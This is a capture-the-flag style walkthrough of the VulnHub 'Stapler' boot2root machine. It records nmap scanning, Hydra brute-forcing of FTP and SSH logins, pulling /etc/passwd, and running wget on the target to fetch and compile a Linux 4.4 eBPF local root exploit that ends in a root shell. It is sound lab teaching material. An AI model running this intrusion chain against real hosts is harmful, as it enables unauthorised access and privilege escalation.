Stapler is a boot2root with multiple paths to shell and root, written by g0tmi1k. I found the simple brute force path the most obvious on the first play through but I think I will visit this one again.

Discovery & Enumeration

root@kali:~# mkcd VulnHub/Stapler
root@kali:~/VulnHub/Stapler# netdiscover -pr 10.1.11.0/24
 Currently scanning: (passive)   |   Screen View: Unique Hosts

 1 Captured ARP Req/Rep packets, from 4 hosts.   Total size: 60
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname
 -----------------------------------------------------------------------------
 10.1.11.137     08:00:27:f2:ed:b4      1      60  Cadmus Computer Systems
root@kali:~/VulnHub/Stapler# echo 10.1.11.137 > ip
root@kali:~/VulnHub/Stapler# nmap -A -p- -T5 $(cat ip)
Starting Nmap 7.12 ( https://nmap.org ) at 2016-06-29 15:36 BST
Nmap scan report for red.initech.vulnlab.fbcnt.in (10.1.11.137)
Host is up (0.00022s latency).
Not shown: 65523 filtered ports
PORT      STATE  SERVICE     VERSION
20/tcp    closed ftp-data
21/tcp    open   ftp         vsftpd 2.0.8 or later
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: Can't parse PASV response: "Permission denied."
22/tcp    open   ssh         OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 81:21:ce:a1:1a:05:b1:69:4f:4d:ed:80:28:e8:99:05 (RSA)
|_  256 5b:a5:bb:67:91:1a:51:c2:d3:21:da:c0:ca:f0:db:9e (ECDSA)
53/tcp    open   domain      dnsmasq 2.75
| dns-nsid:
|   id.server: patriot.fbcnt.in
|_  bind.version: dnsmasq-2.75
80/tcp    open   http
|_http-title: 404 Not Found
123/tcp   closed ntp
137/tcp   closed netbios-ns
138/tcp   closed netbios-dgm
139/tcp   open   netbios-ssn Samba smbd 3.X (workgroup: RED)
666/tcp   open   doom?
3306/tcp  open   mysql       MySQL 5.7.12-0ubuntu1
| mysql-info:
|   Protocol: 53
|   Version: .7.12-0ubuntu1
|   Thread ID: 27
|   Capabilities flags: 63487
|   Some Capabilities: LongPassword, IgnoreSpaceBeforeParenthesis, ConnectWithDatabase, SupportsTransactions, Support41Auth, FoundRows, Speaks41ProtocolOld, InteractiveClient, Speaks41ProtocolNew, SupportsLoadDataLocal, ODBCClient, SupportsCompression, IgnoreSigpipes, DontAllowDatabaseTableColumn, LongColumnFlag
|   Status: Autocommit
Kv\x12\x19`"dx\s\x01ptM"
12380/tcp open   http        Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Tim, we need to-do better next year for Initech

Host script results:
|_nbstat: NetBIOS name: RED, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
|   OS: Windows 6.1 (Samba 4.3.9-Ubuntu)
|   Computer name: red
|   NetBIOS computer name: RED
|   Domain name:
|   FQDN: red
|_  System time: 2016-06-29T16:38:10+01:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smbv2-enabled: Server supports SMBv2 protocol

TRACEROUTE
HOP RTT     ADDRESS
1   0.22 ms red.initech.vulnlab.fbcnt.in (10.1.11.137)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 106.26 seconds

Anonymous FTP, etc

A lot running on this box, working top-to-bottom anonymous ftp immediately caught my attention so I started there.

root@kali:~/VulnHub/Stapler# lftp -e 'set ftp:passive-mode false' -u anonymous,anonymous $(cat ip)
lftp anonymous@10.1.11.137:~> ls
-rw-r--r--    1 0        0             107 Jun 03 23:06 note
lftp anonymous@10.1.11.137:/> cat note
Elly, make sure you update the payload information. Leave it in your FTP account once your are done, John.
107 bytes transferred
lftp anonymous@10.1.11.137:/> exit

So we have a note for Elly left by John, heavily implying there is an FTP user named Elly.

root@kali:~/VulnHub/Stapler# echo elly > users
root@kali:~/VulnHub/Stapler# hydra -L users -P /usr/share/seclists/Passwords/rockyou-10.txt -e nsr ftp://$(cat ip)
Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2016-06-29 15:48:02
[DATA] max 16 tasks per 1 server, overall 64 tasks, 95 login tries (l:1/p:95), ~0 tries per task
[DATA] attacking service ftp on port 21
[21][ftp] host: 10.1.11.137   login: elly   password: ylle
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2016-06-29 15:48:06

So Elly clearly isn’t very security conscious, as her password is elly. Lets take a look in her FTP account.

She Sells SSH Shells…

root@kali:~/VulnHub/Stapler# lftp -e 'set ftp:passive-mode false' -u elly,ylle $(cat ip)
lftp elly@10.1.11.137:~> ls
drwxr-xr-x    5 0        0            4096 Jun 03 13:51 X11
drwxr-xr-x    3 0        0            4096 Jun 03 13:51 acpi
-rw-r--r--    1 0        0            3028 Apr 20 23:09 adduser.conf
-rw-r--r--    1 0        0              51 Jun 03 19:20 aliases
-rw-r--r--    1 0        0           12288 Jun 03 19:20 aliases.db
...
lrwxrwxrwx    1 0        0              23 Jun 03 13:49 vtrgb -> /etc/alternatives/vtrgb
-rw-r--r--    1 0        0            4942 Jan 08 14:18 wgetrc
drwxr-xr-x    3 0        0            4096 Jun 03 13:51 xdg
drwxr-xr-x    2 0        0            4096 Jun 03 13:51 xml
drwxr-xr-x    2 0        0            4096 Jun 03 15:20 zsh

And her home directory is /etc! Assuming she can’t read shadow, I’ll grab password so I at least have a user list.

lftp elly@10.1.11.137:/> get shadow
get: Access failed: 550 Failed to open file. (shadow)
lftp elly@10.1.11.137:/> get passwd
2908 bytes transferred

Okay, so far so good. Lets see if any of the users with shell access have equally terrible password policies.

root@kali:~/VulnHub/Stapler# cat passwd | grep -v /false | grep -v /nologin | grep -v :$ | cut -f1 -d: | sort > users
root@kali:~/VulnHub/Stapler# hydra -L users -e nsr -t 4 ssh://$(cat ip)
Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2016-06-29 15:54:12
[DATA] max 4 tasks per 1 server, overall 64 tasks, 84 login tries (l:28/p:3), ~0 tries per task
[DATA] attacking service ssh on port 22
[STATUS] 61.00 tries/min, 61 tries in 00:01h, 23 todo in 00:01h, 4 active
[22][ssh] host: 10.1.11.137   login: SHayslett   password: SHayslett
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2016-06-29 15:55:39

Bingo! This is almost going too well, we’re bound to hit a brick wall soon.

root@kali:~/VulnHub/Stapler# ssh SHayslett@$(cat ip)
-----------------------------------------------------------------
~          Barry, don't forget to put a message here           ~
-----------------------------------------------------------------
SHayslett@10.1.11.137's password:
Welcome back!


SHayslett@red:~$ uname -a
Linux red.initech 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016 i686 i686 i686 GNU/Linux

And I’m in! I seem to recall a Kernel 4.4 local root exploit a few months ago…

root@kali:~/VulnHub/Stapler# searchsploit Linux Kernel 4.4
------------------------------------------------------------------------------------------- ----------------------------------
 Exploit Title                                                                             |  Path
                                                                                           | (/usr/share/exploitdb/platforms)
------------------------------------------------------------------------------------------- ----------------------------------
Linux Kernel <= 4.4.1 - REFCOUNT Overflow/Use-After-Free in Keyrings Local Root (1)        | ./linux/local/39277.c
Linux Kernel <= 4.4.1 - REFCOUNT Overflow/Use-After-Free in Keyrings Local Root (2)        | ./linux/local/40003.c
Linux Kernel 4.4.x (Ubuntu 16.04) - double-fdput() in bpf(BPF_PROG_LOAD) Local Root Exploi | ./linux/local/39772.txt
------------------------------------------------------------------------------------------- ----------------------------------
root@kali:~/VulnHub/Stapler# getsploit 39772
'/usr/share/exploitdb/platforms/linux/local/39772.txt' -> './39772.txt'
root@kali:~/VulnHub/Stapler# cat 39772.txt
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=808

In Linux >=4.4, when the CONFIG_BPF_SYSCALL config option is set and the
kernel.unprivileged_bpf_disabled sysctl is not explicitly set to 1 at runtime,
unprivileged code can use the bpf() syscall to load eBPF socket filter programs.
These conditions are fulfilled in Ubuntu 16.04.

When an eBPF program is loaded using bpf(BPF_PROG_LOAD, ...), the first
function that touches the supplied eBPF instructions is
replace_map_fd_with_map_ptr(), which looks for instructions that reference eBPF
map file descriptors and looks up pointers for the corresponding map files.
...
E-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39772.zip

That sounds perfect, lets grab it on the target machine and see how we fare…

SHayslett@red:~$ wget -q https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39772.zip
SHayslett@red:~$ unzip 39772.zip
Archive:  39772.zip
   creating: 39772/
  inflating: 39772/crasher.tar
  inflating: 39772/exploit.tar
SHayslett@red:~$ tar xvf 39772/exploit.tar
ebpf_mapfd_doubleput_exploit/
ebpf_mapfd_doubleput_exploit/hello.c
ebpf_mapfd_doubleput_exploit/suidhelper.c
ebpf_mapfd_doubleput_exploit/compile.sh
ebpf_mapfd_doubleput_exploit/doubleput.c
SHayslett@red:~$ (cd ebpf_mapfd_doubleput_exploit; ./compile.sh; ./doubleput)
starting writev
woohoo, got pointer reuse
writev returned successfully. if this worked, you'll have a root shell in <=60 seconds.
suid file detected, launching rootshell...
we have root privs now...
root@red:~/ebpf_mapfd_doubleput_exploit# id
uid=0(root) gid=0(root) groups=0(root),1005(SHayslett)

There is only one thing left to do!

root@red:~/ebpf_mapfd_doubleput_exploit# cat /root/flag.txt
~~~~~~~~~~<(Congratulations)>~~~~~~~~~~
                          .-'''''-.
                          |'-----'|
                          |-.....-|
                          |       |
                          |       |
         _,._             |       |
    __.o`   o`"-.         |       |
 .-O o `"-.o   O )_,._    |       |
( o   O  o )--.-"`O   o"-.`'-----'`
 '--------'  (   o  O    o)
              `----------`
b6b545dc11b7a270f4bad23432190c75162c4a2b

Part 1 of the "Stapler 1" series